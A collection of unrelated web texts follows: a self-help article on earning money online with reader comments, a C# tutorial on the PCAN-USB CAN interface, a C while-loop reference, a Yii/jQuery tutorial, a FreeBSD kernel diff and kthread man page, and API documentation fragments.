investigate why certain forms seem to submit correctly but the
database is not updating, or perhaps a generated web page reports
that the server is in a state you would bet it cannot be in. Whatever
the problem, you know you could gather a better understanding if
only you could have access to the running servlet and check the
current state of a few objects. Perhaps you could even temporarily
fix it while you're at it.
In this article I will show you the code of a simple servlet.
This servlet accepts just one attribute via the
POST method. An
equally simple HTML page consisting of a text area and a submit
button is written to interact with it. Yet despite the simplicity
of these two components, what we will have is a powerful tool to
interactively analyze the state of any web application.
Unveiling the Mystery: Introducing the HookServlet
The servlet we want to write needs to be able to hook into any
resource provided by the web server and allow the user to inspect
any part of it. To be able to gather the required information, it
might require flow-control constructs and loops. This leads to one
solution: to make the servlet able to execute a script sent by the
client (i.e., the browser). The script will have not only the
ability to access any server resource, but by manipulating host
objects representing a HTTP request and response, it will be
capable of communicating back to the client.
There are several scripting languages for Java that would be up
to the job, and in this article we will be using "">Rhino. Of course, if you are a
big fan of any of the other many scripting languages for Java, it would
not be too hard to port the servlet to an equivalent implementation
in Jython, Groovy, or similar.
Rhino is a popular open source JavaScript engine written in
Java. Using its API, it is possible with a few lines of code to
create a JavaScript interpreter able to evaluate scripts like
this:
// Script n.1 // printing the current time on the standard output stream java.lang.System.out.println(new java.util.Date()); // script n.2 // writing a log file var FileWriter = Packages.java.io.FileWriter; var fw = new FileWriter("log.txt"); fw.write("hello from rhino"); fw.flush(); fw.close();
Since JavaScript is used so extensively in HTML pages to
manipulate DOM objects, people tend to get confused when it is used
in another environment. However, the language itself is
platform-neutral. The Rhino implementation gains access to any
class by defining two top-level variables named
Packages and
java. The properties of the
variable
Packages are all of the top-level Java packages,
such as
java,
org, and
com.
The variable
java, instead, is just a handy shortcut for
Packages.java.
Let's have a look at how we can integrate the Rhino
engine into our servlet.
import java.io.PrintWriter; import java.io.ByteArrayOutputStream; import java.io.IOException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.mozilla.javascript.Context; import org.mozilla.javascript.Scriptable; import org.mozilla.javascript.EcmaError; public class HookServlet extends HttpServlet { public void doPost(HttpServletRequest httpRequest, HttpServletResponse httpResponse) throws IOException { PrintWriter out=httpResponse.getWriter(); httpResponse.setContentType ("text/html"); httpResponse.setHeader("Cache-Control","no-cache"); String code=httpRequest.getParameter("serverjavascript"); try { Context context= Context.enter(); Scriptable scope=context.initStandardObjects(null); Scriptable jsArgs1=Context.toObject(out, scope); Scriptable jsArgs2=Context.toObject(httpRequest, scope); Scriptable jsArgs3=Context.toObject(httpResponse,scope); scope.put("out", scope,jsArgs1); scope.put("httpRequest", scope,jsArgs2); scope.put("httpResponse",scope,jsArgs3); context.evaluateString(scope, code, "JAVASCRIPT-CODE", 1, null); // flushes and closes the output stream out.flush(); out.close(); } catch(EcmaError e) { ByteArrayOutputStream baos = new ByteArrayOutputStream(); PrintWriter pw = new PrintWriter(baos); e.printStackTrace(pw); pw.flush(); out.println("<html><body><pre>"); out.println("Exception caused by serverside"+ " script execution:\n"); out.println(new String(baos.toByteArray())); out.println("</pre></body></html>".getBytes()); out.flush(); out.close(); } finally { Context.exit(); } } }
The
doPost method is overridden to process the HTML
form posting. In it, the following actions are performed:
- From the
httpRequestobject, we retrieve the
serverjavascriptparameter.
- A Rhino
Contextis initialized.
Contextis an environment for the script to run
in.
- The variables
out,
httpRequest,
and
httpResponseare made available to the script.
- The script is executed.
The exception handling ensures that the stack trace of any
exception caused by the script is passed back to the client.
To interact with the
HookServlet on the client side,
all we have to do is to create an HTML page with a
textarea to host the script, and a button to post it.
Figure 1 shows what it looks like:
Figure 1. The HTML page that interacts with the
HookServlet
Installing the HookServlet
Deploying the
HookServlet in your servlet container
or web server is probably no more work than deploying any other
servlet, and can be easily achieved by packaging the various parts
into a WAR file. However, to use the servlet to interact with your
application, you probably want to install an instance of the
HookServlet into your existing WAR file. In this way,
the
HookServlet will share the same class-loader as
your web application and will have access to the same classes and
resources.
The rules to remember are:
- The client-side files (the HTML file hookpage.html and the
image hook.jpg) are stored in the top-level directory.
- The HookServlet is stored in the WEB-INF/classes
directory.
- The Rhino library (consisting of two files: js.jar and
xbeans.jar) is added in the WEB-INF/lib
directory.
In the deployment descriptor web.xml, we just add a few
lines to enable the servlet.
... <servlet> <servlet-name>HookServlet</servlet-name> <servlet-class>HookServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>HookServlet</servlet-name> <url-pattern>/hook</url-pattern> </servlet-mapping> ...
The full path to access the
HookServlet will now
depend on the name of your WAR file and the web server's URL. For
example, if we are running Apache Tomcat on the standard 8080 port
and the WAR file is named webapplication.war, the path to the
servlet would be:
And the path to the HTML page would be:
Running the HookServlet
Once you have the
HookServlet installed in your web
server or servlet container, you can start exploring the resources,
libraries, and API by writing simple programs.
In this section, I will provide two short examples. I will
deliberately keep them uncomplicated to avoid generating any
confusion, confident that you can see beyond their simplicity and
get the gist of this technique.
Example: Getting the
System Properties
The first example shows how to get the get
System properties
with which your web server was started. This is particularly useful
when a certain behavior of the system is dependant on a
System
property that might not have been properly set.
// importing. var System = java.lang.System; var Arrays = java.util.Arrays; // getting the properties and ordering them. var props = System.getProperties(); var keys = props.keySet().toArray(); Arrays.sort(keys); // printing the content. out.println("<HTML><BODY><PRE>"); for (var i=0;i<keys.length;i++) { out.println(keys[i]+" --> "+ props.get(keys[i])); } out.println("</PRE></BODY></HTML>");
Copy and paste the example above and you will get an answer that
looks something like Figure 2:
Figure 2. Output from the HookServlet: Showing the
System
Properties
Example: Listing the .jars to Start up Tomcat
The second example assumes you are running Apache Tomcat as your
web server. The code first gets the
ClassLoader
instance responsible for loading the
HttpResponse
class, and then (because it knows the
classLoader instance is a
subclass of the
URLClassLoader) gets and prints each
URL in it.
var loader = httpResponse.getClass().getClassLoader(); var urls = loader.getURLs(); out.println("<pre>"); for (var i=0;i<urls.length;i++) { out.println ( urls[i] ); } out.println("</pre>");
This produces an output like Figure 3:
Figure 3. Output from the HookServlet: .jars used to start up
Tomcat
Conclusions
In this article, we have shown a powerful technique that allows
the developer to interact dynamically with any Java
web application. The technique is based on the idea of sending
scripts from the client side to run on the server side. The
implementation we presented uses JavaScript to interpret the server-side scripts, although with a little effort it could be easily
adapted to use a different scripting language for Java.
The final result is a useful tool to help you working with any
Java web application at any stage of the development: the
HookServlet.
A final observation: the
HookServlet is so
intrinsically powerful that almost any servlet could be replaced by
it ("almost" because in our current implementation the JavaScript
can only override the
doPost method and none of the
other methods in the servlet). All of the work would therefore be
done in the HTML page that would embed both the client-side and
the server-side scripts. While this might not be the best solution
in many cases, there's much to be said about having client-side and
server-side code in one unique place and treating the server-side
as a collection of .jars and other resources ready to be
exploited.
Resources
- Sample code for this article
(includes HookServlet source and class, HTML and image for upload
page, and web.xml descriptor)
- Rhino JavaScript
engine
- Java Servlet
Technology
- Apache
Tomcat
- Login or register to post comments
- Printer-friendly version
- 6043 reads | https://today.java.net/pub/a/today/2005/09/23/dynamic-web-app-interaction.html | CC-MAIN-2015-14 | refinedweb | 1,643 | 57.87 |
How to Save Data to MySQL Database- Python Web Scraping
How to Save Data to MySQL Database- Python Web Scraping
Send download link to:
In one of our previous tutorials we saw how to save data to CSV and Excel files. In this tutorial we will learn how we can save data to MYSQL database directly from Python and Jupyter Notebook.
MySQL is an open-source relational database management system (RDBMS)..
To download and setup MySQL db please go to website and follow the instruction.
Also if you are not comfortable with writing SQL query in command line to work with MySQL we recommend you to use Navicat software. Using this you can easily view your database, tables, create new db, tables etc. You can download it here.
Once Navicat is installed open it and create a connection to MySQL db by clicking on connection:
It will ask for name for the connection and a username and password. Notedown the username and password as we will need it in python code. Once a connection is established, create a database and name it “scraping” as highlighted above. Now your database is ready and you can start creating tables and storing data into it.
First let’s go to the webpage and inspect the data we want to scrape:
We want to grab the data in IFPI 2017 Data table, which is a tabular data. As we can see the name of columns is under theadtag and rest of the data is under tbody tag.So using these two tags and writing for loop we can scrap the data.
We will use pymysql module to connect with MySQL using Python.
Below is the detailed code for scraping and saving data to Database. For detailed explanation watch the video:
import bs4 import urllib.request from urllib.request import urlopen from bs4 import BeautifulSoup as soup #Go to webpage and scrape data html = urlopen('') bsobj = soup(html.read()) tbody = bsobj('table',{'class':'wikitableplainrowheaders sortable'})[0].findAll('tr') xl = [] for row in tbody: cols = row.findChildren(recursive = False) cols = tuple(element.text.strip().replace('%','') for element in cols) xl.append(cols) xl = xl[1:-1] #install pymysql module to connect with MySQL Database pip install pymysql import pymysql # Store credantials in file my.propertiesans use Config parser to read from it import configparser config = configparser.RawConfigParser() config.read(filenames = 'my.properties') print(config.sections()) h = config.get('mysql','host') u = config.get('mysql','user') p = config.get('mysql','password') db = config.get('mysql','db') # Open database connection scrap_db = pymysql.connect(h,u,p,db) # prepare a cursor object using cursor() method cursor = scrap_db.cursor() # Drop table if it already exist using execute() method. cursor.execute("DROP TABLE IF EXISTS WIKI2 ") # Create table as per requirement sql = """CREATE TABLE WIKI2 ( RANKINGINT, MARKETCHAR(50), RETAIL_VALUECHAR(20), PHYSICALINT, DIGITALINT, PERFORMANCE_RIGHTSINT, SYNCHRONIZATIONINT )""" cursor.execute(sql) #Save data to the table scrap_db = pymysql.connect(h,u,p,db) mySql_insert_query = """INSERT INTO WIKI2 (RANKING, MARKET, RETAIL_VALUE, PHYSICAL,DIGITAL,PERFORMANCE_RIGHTS,SYNCHRONIZATION) VALUES (%s, %s, %s, %s ,%s, %s, %s) """ records_to_insert = xl cursor = scrap_db.cursor() cursor.executemany(mySql_insert_query, records_to_insert) scrap_db.commit() print(cursor.rowcount, "Record inserted successfully into WIKI2 table") # disconnect from server scrap_db.close()
Hope you enjoyed our tutorial to save data in to MySQL database. We have years of experience in data scraping services and make this tutorial series for learning purpose. In case of any doubt contact us we are ready to serve you. | https://www.worthwebscraping.com/how-to-save-data-to-mysql-database-python-web-scraping/ | CC-MAIN-2022-05 | refinedweb | 574 | 50.23 |
NAME
ng_async - asynchronous framing netgraph node type
SYNOPSIS
#include <sys/types.h>
#include <netgraph/ng_async.h>
DESCRIPTION
The async node type performs conversion between synchronous frames and asynchronous frames, as defined for the PPP protocol in RFC 1662. Asynchronous framing uses flag bytes and octet-stuffing to simulate a frame oriented connection over an octet-oriented asynchronous serial line.

The node transmits and receives asynchronous data on the async hook. Mbuf boundaries of incoming data are ignored. Once a complete packet has been received, it is decoded and stripped of all framing bytes, and transmitted out the sync hook as a single frame.

Synchronous frames are transmitted and received on the sync hook. Packets received on this hook are encoded as asynchronous frames and sent out on async. Received packets should start with the address and control fields, or the PPP protocol field if address and control field compression is employed, and contain no checksum field. If the first four bytes are 0xff 0x03 0xc0 0x21 (an LCP protocol frame) then complete control character escaping is enabled for that frame (in PPP, LCP packets are always sent with no address and control field compression and all control characters escaped).

This node supports “flag sharing” for packets transmitted on async. This is an optimization where the trailing flag byte of one frame is shared with the opening flag byte of the next. Flag sharing between frames is disabled after one second of transmit idle time.
HOOKS
This node type supports the following hooks:

async   Asynchronous connection. Typically this hook would be connected to a ng_tty(4) node, which handles transmission of serial data over a tty device.

sync    Synchronous connection. This hook sends and receives synchronous frames. For PPP, these frames should contain address, control, and protocol fields, but no checksum field. Typically this hook would be connected to an individual link hook of a ng_ppp(4) type node.
CONTROL MESSAGES
This node type supports the generic control messages, plus the following:

NGM_ASYNC_CMD_GET_STATS   This command returns a struct ng_async_stat containing node statistics for packet, octet, and error counts.

NGM_ASYNC_CMD_CLR_STATS   Clears the node statistics.

NGM_ASYNC_CMD_SET_CONFIG   Sets the node configuration, which is described by a struct ng_async_cfg:

struct ng_async_cfg {
    u_char    enabled;   /* Turn encoding on/off */
    u_int16_t amru;      /* Max receive async frame len */
    u_int16_t smru;      /* Max receive sync frame len */
    u_int32_t accm;      /* ACCM encoding */
};

The enabled field enables or disables all encoding/decoding functions (default disabled). When disabled, the node operates in simple "pass through" mode. The amru and smru fields are the asynchronous and synchronous MRU (maximum receive unit) values, respectively. These both default to 1600; note that the async MRU applies to the incoming frame length after asynchronous decoding. The accm field is the asynchronous character control map, which controls the escaping of characters 0x00 through 0x1f (default 0xffffffff).

NGM_ASYNC_CMD_GET_CONFIG   This command returns the current configuration structure.
SHUTDOWN
This node shuts down upon receipt of a NGM_SHUTDOWN control message, or when all hooks have been disconnected.
SEE ALSO
netgraph(4), ng_ppp(4), ng_tty(4), ngctl(8) W. Simpson, PPP in HDLC-link Framing, RFC 1662. W. Simpson, The Point-to-Point Protocol (PPP), RFC 1661.
HISTORY
The ng_async node type was implemented in FreeBSD 4.0.
AUTHORS
Archie Cobbs 〈[email protected]〉 | http://manpages.ubuntu.com/manpages/hardy/man4/ng_async.4.html | CC-MAIN-2015-35 | refinedweb | 540 | 55.95 |
An important feature of SQL Server 2000 is the ability to retrieve XML-formatted metadata that defines the content model (what elements will be present, their nesting structure, and what types of data they contain) of an XML document.
This metadata comes in the form of a well-formed XML document known as an XML-Data schema. It can be returned in queries that use any of the three FOR XML modes, and to get it, you specify the XMLDATA option, as exemplified in Listing 41.6.
SELECT TOP 2 OrderID, OrderDate, CustomerID
FROM Orders
FOR XML AUTO, XMLDATA
go

<Schema name="Schema1" xmlns="urn:schemas-microsoft-com:xml-data"
        xmlns:dt="urn:schemas-microsoft-com:datatypes">
  <ElementType name="Orders" content="empty" model="closed">
    <AttributeType name="OrderID" dt:type="i4"/>
    <AttributeType name="OrderDate" dt:type="dateTime"/>
    <AttributeType name="CustomerID" dt:type="string"/>
    <attribute type="OrderID"/>
    <attribute type="OrderDate"/>
    <attribute type="CustomerID"/>
  </ElementType>
</Schema>
<Orders xmlns="x-schema:#Schema1" OrderID="10248"
        OrderDate="1996-07-04T00:00:00" CustomerID="VINET"/>
<Orders xmlns="x-schema:#Schema1" OrderID="10249"
        OrderDate="1996-07-05T00:00:00" CustomerID="TOMSP"/>
First note that the schema is always output directly on top of your XML results. Schema is always its root element, and its name attribute has a special function: It declares the document as a namespace. When a namespace is used, elements in other XML documents might contain the elements defined in this schema by specifying the name of the schema as the value of their xmlns (XML Namespace) attribute.
Orders elements, for example, are linked to Schema1 by way of their xmlns attribute. The value of xmlns (preceded by "x-schema:") points back to the schema as a way of indicating that the metadata in the schema applies to Orders elements. The # sign indicates that the schema is inline (it works just like the # sign does in HTML links) or contained within the XML document it describes. (Note also that schemas themselves refer to a Microsoft namespace in their xmlns attribute.)
The name attribute will always have a value of Schema followed by an integer. This integer is incremented automatically by SQL Server after every query generated during the same session to prevent what is known as a namespace collision?when two XML documents declare the same namespace. It's necessary to rename the schema in this way because it differentiates one schema from any other that might have been produced by a query executed during the same SQL Server session.
The structure of the schema provides useful information about the XML. The values of its elements and attributes will differ depending on the mode and options you specify in the FOR XML clause. The elements that will be present (as of this writing; please note that the specification for XML Schemas is a work in progress) are as follows:

ElementType: For every XML element, an ElementType element that defines it is produced. It has the following attributes:

<ElementType content="{empty | textOnly | eltOnly | mixed}"
             dt:type="..." model="{open | closed}" name="..." >
The most useful attribute of ElementType is dt:type. It tells any code you use to process the schema what kind of data the element named in its name attribute contains. When you convert the schema using an XML stylesheet, for example, it is far easier to generically parse XML elements based on the value of dt:type than by testing the element's value.
The value of dt:type is a string representation of the XML datatype to which the SQL Server datatype of the selected column corresponds. The most common are dateTime (corresponding to datetime), i4 (a four-byte integer corresponding to int), and string (corresponding to varchar). See the MSDN Online topic titled "XML Data Types" for more information.
The content attribute is also of interest. It specifies how the XML for the named element is formed?whether it is empty (contains no data), textOnly (contains only data but no child elements), eltOnly (contains elements only) or mixed (contains both data and child elements).
AttributeType: ElementType elements contain these elements. They specify the name and type of any attributes that the element specified in its name attribute has.

attribute: ElementType elements contain these elements. They define an element's attributes and refer back to AttributeType via their type attribute.
Knowing these things about your XML results before parsing them enables you to write generic processing code that is far more likely to be reused than code that is purely data-specific. | http://etutorials.org/SQL/microsoft+sql+server+2000/Part+VI+Additional+SQL+Server+Features/Chapter+41.+Using+XML+in+SQL+Server+2000/Retrieving+XML-Data+Schemas/ | CC-MAIN-2017-04 | refinedweb | 734 | 52.39 |
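The claim about generic processing is easy to demonstrate outside of stylesheets too: a few lines of Python (illustrative, not from the article) can pull the dt:type of every attribute out of the inline schema and drive type-aware parsing from that map rather than from the data itself. The sample schema string below is the one produced by the query above.

```python
import xml.etree.ElementTree as ET

schema = """<Schema name="Schema1" xmlns="urn:schemas-microsoft-com:xml-data"
        xmlns:dt="urn:schemas-microsoft-com:datatypes">
  <ElementType name="Orders" content="empty" model="closed">
    <AttributeType name="OrderID" dt:type="i4"/>
    <AttributeType name="OrderDate" dt:type="dateTime"/>
    <AttributeType name="CustomerID" dt:type="string"/>
  </ElementType>
</Schema>"""

XD = 'urn:schemas-microsoft-com:xml-data'    # XML-Data namespace
DT = 'urn:schemas-microsoft-com:datatypes'   # datatypes namespace

root = ET.fromstring(schema)
types = {}
for et in root.iter('{%s}ElementType' % XD):
    for at in et.iter('{%s}AttributeType' % XD):
        # dt:type expands to the datatypes namespace; name is unprefixed
        types[at.get('name')] = at.get('{%s}type' % DT)

print(types)  # {'OrderID': 'i4', 'OrderDate': 'dateTime', 'CustomerID': 'string'}
```

A consumer could dispatch on that map, e.g. converting every dateTime attribute with one shared routine instead of column-specific code.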
System.out.println(exp); is used to display messages to the command window. If we go further into the functioning of the System.out.println() statement, we will find that:

1. System is a class built into the core Java language, and it is defined within the java.lang package.

2. out is a public static member of the System class, of type PrintStream. Thus, the expression System.out refers to an object of type PrintStream.

3. The (overloaded) println method of the PrintStream class accepts an expression as an argument and displays it in String form to the standard output window (i.e., the command-line window from which the program was invoked). There are multiple println overloads with different arguments. Every println makes a call to write(), and write() takes care of displaying data to the standard output window.

We therefore never need to instantiate a System object to print messages to the screen; we simply call the println method on the System class's public static PrintStream member, out.

Now, you might be wondering: can we create an object of PrintStream and call the println function with that object to print to the standard output (usually the console)? The answer is NO. When you want to print to the standard output, you will use System.out. That's the only way. Instantiating a PrintStream will allow you to write to a File or OutputStream you specify, but it doesn't have anything to do with the console.

However, you can pass System.out to a PrintStream and then invoke println on the PrintStream object to print to the standard output. Following is a small example:
import java.io.*;

public class SystemOutPrintlnDemo {
    public static void main(String[] args) {
        // Creating a PrintStream object that wraps System.out
        PrintStream ps = new PrintStream(System.out);
        ps.println("Hello World!");
        ps.print("Hello World Again!");
        // Flushes the stream
        ps.flush();
    }
}

OUTPUT
======
D:\JavaPrograms>javac SystemOutPrintlnDemo.java
D:\JavaPrograms>java SystemOutPrintlnDemo
Hello World!
Hello World Again!
Hope you have enjoyed reading about the working of System.out.println.
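For readers coming from Python, the same pattern exists there: print() writes to the module-level sys.stdout stream by default, and you can hand it any other writable stream instead, which is the Python analogue of wrapping a stream of your choice in a PrintStream. A short illustrative sketch:

```python
import io

# By default, print() writes to sys.stdout, just as println writes to System.out.
print("Hello World!")

# But print() accepts any writable stream via its file= parameter,
# much like constructing a PrintStream around a stream of your choice.
buf = io.StringIO()
print("Hello World Again!", file=buf)
print(buf.getvalue())  # -> Hello World Again!
```

The console itself is still reached only through the process's standard output stream; redirecting to another stream simply writes elsewhere, exactly as with a PrintStream over a File.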
LimPy
Limited Python
LimPy parses a limited version of the Python grammar. It supports basic Python syntax, but is known not to support the following:
- classes
- function definition
- multi-variable assignment
- list and generator comprehensions
The goal is to be able to expose various Python objects to a scripting environment where non-professional programmers can write simple code to solve various problems.
Origins
LimPy originated in a survey system at YouGov where it gave the users scripting questionnaires the ability to include various bits of Python code that is executed during survey interviews.
A previous version of the survey system allowed Python code but it was not type checked and non-syntactical bugs were only reached at run time.
LimPy was successful in still offering much of the power of Python at runtime but checking types, operations on types, and function/method call signatures before runtime to ensure that an entire class of bugs was avoided.
Role
LimPy checks code. You supply it with a namespace of helper objects, another namespace of variables, and source code, and it will raise various LimPy exceptions if there are problems, or return the parsed code and the updated namespace of variables if there were new variables defined in the source.
LimPy does not execute the code. That is up to your runtime system to handle. The returned variables namespace contains only types as values, not real runtime values. Deciding what to do with that namespace is up to your runtime code.
Because LimPy is a strict subset of Python, it can typically be exec'd directly by Python.
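LimPy's actual API is not shown here, but the general shape of a "check before exec" gate is easy to sketch in plain Python: walk the AST of the source, reject the constructs the dialect forbids (classes, function definitions, comprehensions), and exec the source only if it passed. This is an illustrative toy, not LimPy's checker, and unlike LimPy it does no type checking:

```python
import ast

# Constructs the sketch rejects, mirroring LimPy's unsupported list above.
FORBIDDEN = (ast.ClassDef, ast.FunctionDef, ast.ListComp, ast.GeneratorExp)

def check(source: str) -> ast.Module:
    """Parse source and raise SyntaxError if it uses a forbidden construct."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, FORBIDDEN):
            raise SyntaxError('construct not allowed: %s' % type(node).__name__)
    return tree

def run(source: str, variables: dict) -> dict:
    """Check the source first, then exec it and return the updated namespace."""
    check(source)
    exec(source, {}, variables)
    return variables

ns = run("x = 2\ny = x * 3", {})
print(ns['y'])  # -> 6
```

The split matters: check() can run long before interview time, while run() (or your own runtime) decides what to do with the resulting namespace.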
Testing
LimPy includes some unit tests. To run them, simply invoke setup.py test or install the latest pytest. See the jenkins script for the routine used at YouGov to perform continuous integration testing on this project.
Changes
2.0
- Added limpy.types.Signature, which replaces build_sig, SigInfo, and signature functions. Any code that uses or references these deprecated functions will need to be updated.
- TypeSpecification.add_method now only accepts a Signature instance.
- LimPy now expects all dynamically-dispatched types to be classes that must provide IDynamicType (and need not necessarily be subclasses of DynamicDispatch).
Clients upgrading to LimPy 2.0 will typically just need to update their @limpy.types.signature decorators to instead use @limpy.types.Signature. Any calls to a TypeSpecification.add_method will need to first construct a Signature instance (with the same parameters).
For libraries that do more intimate things with the signatures, it will be necessary to update those references. See the repository changelog for details on how this was done within the LimPy project itself.
1.2.2
- Improved newline counting and tests.
- Empty source or source only comments is now valid LimPy.
1.2.1
- Restored Python 2.5 compatibility.
1.2
- Updated to PLY 3.4
- Now by default LimPy does not write files to the current directory.
1.1
- LimPy no longer allows assignment to Python reserved words. | https://bitbucket.org/yougov/limpy/src/a7bfee50e6e5?at=2.0b9 | CC-MAIN-2015-27 | refinedweb | 491 | 57.57 |
How To Create PDFs in Rails
We worked with The Bill of Rights Institute recently to create an interactive digital course for American History teachers. One of the interesting challenges, among many, stemmed from the fact that the project had large sections of readable content. One of our goals was to make it easy for students and teachers to print out their reading material if and when they’re not able to read it on screen.
To make printing possible, I needed to create PDF files that were similar to the HTML content. These files needed to be both viewable in the browser and downloadable from the page the content lived on. In some cases, we wanted to selectively remove some elements from the page or apply a slightly different stylesheet for printing the content.
After a bit of research, I found two possible approaches:
- Generate a PDF “by hand” from source data using a tool like prawn
- Take a source HTML document and transform that into a PDF
Taking the source HTML document and converting sounded ideal, because I wanted to keep similar CSS styling and layout of the page with minimal modifications. Since prawn is not an HTML to PDF generator, I investigated the following tools:
- Prince — A command line tool that can take an HTML source file from disk and turn it into a PDF. It can read from a local file or a URL. However, it’s pretty pricey; a server license carries a one-time fee of $3800.
- DocRaptor — Basically, this is Prince offered as a service.
- wkhtmltopdf — A free option that uses the WebKit rendering engine within QT.
wkhtmltopdf sounded like the best option to explore since it uses a browser engine to render the page and then save as a PDF. I found two Ruby gems that use this library: PDFKit & Wicked PDF.
I initially started using PDFKit and its included middleware, and I was able to very quickly get viewable and downloadable PDFs.
I enjoyed that the necessary binary files are included with the gem for a number of operating system environments, which saves you from having to install different packages in your respective application environments (OS X vs Ubuntu).
While PDFKit worked great at first, I eventually encountered a roadblock: I needed to be able to include different stylesheets and layouts for different "types" of PDF files, which PDFKit didn't appear to support. I was also struggling to get asset paths working correctly on Heroku. The PDF generation actually happens in a separate process, so I somehow needed to use absolute URLs for paths to all assets.
After a bit of searching, I found the excellent Wicked PDF gem.
Wicked PDF
Wicked PDF doesn't package the binaries in the main gem, but it's simple to include the binaries that you need (you can grab from PDFKit gem) in your bin/ directory and set up Wicked PDF like:
platform = RUBY_PLATFORM
if platform.include?("darwin")
  # OS X machine
  binary_path = Rails.root.join('bin', 'wkhtmltopdf-0.9.9-OS-X-i386').to_s
elsif platform.include?("64-linux")
  # 64-bit linux machine
  binary_path = Rails.root.join('bin', 'wkhtmltopdf-amd64').to_s
end

WickedPdf.config = {
  :exe_path => binary_path
}
Wicked PDF also has the optional middleware, but I decided to not use it so that I could have more fine-grained control over where PDF files can be accessed and specifying their layout and template for each "type."
Viewing PDFs in the browser:
respond_to do |format|
  format.pdf do
    render :pdf => "my_pdf_name.pdf",
           :disposition => "inline",
           :template => "controller_name/show.pdf.erb",
           :layout => "pdf_layout.html"
  end
  format.html
end
Downloading PDFs as a file:
def download
  html = render_to_string(:action => :show, :layout => "pdf_layout.html")
  pdf = WickedPdf.new.pdf_from_string(html)
  send_data(pdf, :filename => "my_pdf_name.pdf", :disposition => 'attachment')
end
Wicked PDF also includes examples and handy helper methods for specifying assets and substituting them inline into the HTML document:

<%= wicked_pdf_stylesheet_link_tag "my_styles" %>

and

<%= wicked_pdf_javascript_include_tag "my_scripts" %>
It also allows for easily debugging the PDF page by viewing it as an HTML page. You can do this by using the described option:
:show_as_html => params[:debug].present?
This allows you to simply add a
?debug=true to the end of your path. Example:...
Ultimately, I found Wicked PDF to be the best choice due to: ease of setup, ease of using different layouts and assets for PDFs, and excellent documentation and examples. Some of the examples included how to use assets on Heroku, assets from a CDN, using the asset helper methods, and how to generate and download files using
send_file.
Have you worked on a similar project? Any input on best solutions? Let us know in the comments below. | https://www.viget.com/articles/how-to-create-pdfs-in-rails/ | CC-MAIN-2018-22 | refinedweb | 776 | 62.68 |
Re: Iterating through an enum???
From: Simon Trew (noneofyour_at_business.guv)
Date: 04/29/04
Date: Thu, 29 Apr 2004 09:13:20 +0100
"muchan" <[email protected]> wrote in message
news:[email protected]...
>
> Whatever the specification is, and whatever is theoretically possible,
> I stand that "enum" stands for "enumeration", so I'd recommend (myself)
> to enumerate all the possible value in the definition, either used or
> not used in a concrete program.
Well, if there are say 10 "base" values in an enum, each representing a
one-bit flag, then there would be 2^10 = 1024 possible values of the
enumeration, few of which are likely to be used. It seems a bit of overkill
to have to name and specify them.
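The combinatorics in that objection are easy to see in any language with first-class flag enums. A Python sketch (not part of the C++ thread, purely to illustrate the blow-up): with n one-bit base members there are 2**n possible combined values, which is why nobody enumerates them all by name.

```python
from enum import Flag, auto
from itertools import combinations

class Perm(Flag):
    READ = auto()
    WRITE = auto()
    EXEC = auto()

# Enumerate every possible combination of the 3 base flags (including empty).
base = list(Perm)
combos = set()
for r in range(len(base) + 1):
    for subset in combinations(base, r):
        value = Perm(0)
        for f in subset:
            value |= f
        combos.add(value)

print(len(combos))  # -> 8, i.e. 2**3; with 10 base flags it would be 1024
```

Only the 3 base members are named; the other 5 combined values exist as legal runtime values without names, which is exactly the situation the C++ thread is debating.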
Are you just unhappy with the idea of enums representing sets of
flags/values? Unfortunately for whatever reason that has become the norm in
C and C++; this mechanism is almost always preferred to using bitfields, for
example. At least we keep all the values together in a logical grouping (the
enum), although I can see the advantage of defining consts in a namespace
instead (because then you have to refer to the enum values through the
namespace scope, like in C++).
>...
It is. (You could have tried it.)
> If combination is infinit (well, always finit within the range of int...)
> and/or too many that it isn't practical to enumerate all, I think i should
> use integer instead of enum from the starting. :)
Well it is part of the common-sense definition of an enumeration that you
can, er, enumerate the items in it, i.e. you can define the contents of the
set by specifiying each of its members rather than having to specify them
with a formula ("set comprehension"). So it seems fair enough that C++
honors this definition by requiring you to enumerate the members of the
enum.
> Or, another (self) guidance would be all the explicite values in enum
> declaration should be defined as constant, either with #define or with
> const int.
I don't know what you think that gains you over defining them in an enum.
> (...and I don't know if const int declaration is treated with compiler
> without allocation in the runtime program...)
>
> so above case
> const int A = 1;
You must be able to get a pointer/reference to A within the program, and to
do that, A would have to be allocated a memory location. But, if you don't
actually get a pointer/reference to A within your program, I think the
compiler is free to get rid of the allocation. i.e. in some programs the
optimizer would be able to replace all uses of A with the const value that A
represents, and then there's no need to allocate memory for A. The optimizer
might not do this if the initialization expression was more complicated than
a simple numeric literal.
I did think that a const declaration of the form:
const A = 1;
would definitely *not* let you take a pointer/reference to A (you don't know
its type, for a start). But in VC6 it happily let me take an int* to A.
This might just be a bug.
> I would define entire definition string in macro:
>
> #define ABC_ENUM { a = A, b, c, d, e = E, ae = AE, be, ce, de }
> enum abc ABC_ENUM;
> abc abcarray[] = ABC_ENUM;
Unfortunately the ABC_ENUM is not a valid initialization list for the array.
> Then I'd like to reduce the duplicate memory, so the array declaration
> should be inside the constructor of a class, which wraps the enum from
> global namespace,
>
> ABC::ABC()
> {
> abc abcarray[] = ABC_ENUM; // temporary hold the value in array
> v_abc = std::vector(abcarray); // this is redundant, elements are
copyed twice!
> }
You could just use v_abc.push_back() to put the individual elements in
rather than copy.
for (int i = 0; i < sizeof(abcarray)/sizeof(abcarray[0]); ++i)
    v_abc.push_back(abcarray[i]);
Command Line (How Do I in Visual C++)
This page links to help on tasks related to command line development using Visual C++. To view other categories of popular tasks covered in Help, see How Do I in Visual C++.
- Compiling a Native C++ Program from the Command Line (C++)
Demonstrates how to create a simple Visual C++ program with a text editor and compile it on the command line.
- Compiler Options
Introduces cl.exe, a tool that controls the Microsoft C and C++ compilers and linker.
- Linker Options
Introduces LINK, a tool that links Common Object File Format (COFF) object files and libraries to create an executable (.exe) file or dynamic-link library (DLL).
- NMAKE Reference
Introduces the Microsoft Program Maintenance Utility (NMAKE.EXE), a tool that builds projects based on commands contained in a description file.
- NMAKE Features in Visual C++ 2005
Lists the new NMAKE features in Visual C++ 2005.
- VCBUILD Reference
Describes how you can use VCBUILD.exe to build Visual C++ projects and Visual Studio solutions from the command line.
- How to: Run Multiprocessor Builds with VCBUILD
Describes how you can use VCBUILD to run Multiprocessor Builds from the command line.
- Introduction to Visual C++ for UNIX Users
